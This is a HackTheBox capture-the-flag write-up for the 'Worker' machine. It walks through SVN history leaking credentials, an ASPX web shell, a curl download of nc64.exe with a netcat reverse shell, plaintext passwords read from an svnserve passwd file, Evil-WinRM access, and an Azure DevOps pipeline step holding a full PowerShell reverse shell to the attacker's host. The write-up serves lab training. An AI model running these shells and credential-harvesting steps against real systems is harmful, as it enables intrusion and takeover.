Worker — HackTheBox

Worker

TL;DR

This box takes you through some of the repercussions of having an attacker gain a foothold in your organization and the how they would compromise you development infrastructure to pivot or gain persistence.

Foothold Reconnaissance

For the initial recon you will have to start with NMAP

PORT     STATE SERVICE  VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
svn checkout svn://worker.htb
kali@kali:~/HTB/Worker$ svn log
--------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
--------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
--------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line
-
--------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line
Added deployment script
--------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line
First version
--------------------------------------------------------------------
kali@kali:~/HTB/Worker$ svn diff -r 1:2
Index: deploy.ps1
===================================================================
--- deploy.ps1 (nonexistent)
+++ deploy.ps1 (revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen"
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
kali@kali:~/HTB/Worker$ svn diff -r 4:5
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+

Foothold

Since you now have access to the repo, the goal is to drop a shell in the repo and have it built and deployed. If you are on Kali, there is already a copy of such shell in “/usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx” .

cd \Windows\Temp\ && curl -O http://10.10.14.26:8000/nc64.exe
\Windows\Temp\nc64.exe 10.10.14.26 1337 -e cmd.exe

User Reconnaissance

Once on the box you will realized that you cannot really do much you are the user “defaultapppool”.

kali@kali:~/HTB/Worker$ listen 1337
listening on [any] 1337 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 59604
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of C:\Users2020-07-07 16:53 <DIR> .
2020-07-07 16:53 <DIR> ..
2020-03-28 14:59 <DIR> .NET v4.5
2020-03-28 14:59 <DIR> .NET v4.5 Classic
2020-08-17 23:33 <DIR> Administrator
2020-03-28 14:01 <DIR> Public
2020-07-22 00:11 <DIR> restorer
2020-07-08 18:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10�303�868�928 bytes free
C:\Users>cd robisl
cd robisl
Access is denied.
C:\Users>whoami
whoami
iis apppool\defaultapppool
type W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
...
robisl = wolves11
...

User Flag

With these credential you can leverage Evil-WinRM to connect as this “robisl” and grab the user file

kali@kali:~/HTB/Tools$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11Evil-WinRM shell v2.3Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> dir
Directory: C:\Users\robisl\DesktopMode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/6/2020 4:21 AM 34 user.txt
*Evil-WinRM* PS C:\Users\robisl\Desktop>

Root Reconnaissance

Since we have credentials for the user “robisl” you will need to explore what are some of the things he can do in the Azure DevOps portal.

Root Flag

To Create a pipeline, go to the pipeline blade and click on “New pipeline”. Then select “Azure Repos Git” followed by the actual repository. The next step is to select a project type that fit the pipeline that you are creating; it does not really matter what you select here as we will change in the next step. When presented with the yaml in the final step, replace the “steps” with the following that will trigger a powershell.

- task: PowerShell@2
timeoutInMinutes: 10
inputs:
targetType: 'inline'
script: "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.26',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
kali@kali:~/HTB/Worker$ listen 4443
listening on [any] 4443 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 51469
PS W:\agents\agent11\_work\14\s> cd C:
PS C:\> cd Users\Administrator
PS C:\Users\Administrator> cd Desktop
PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\DesktopMode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2020-12-07 18:06 34 root.txt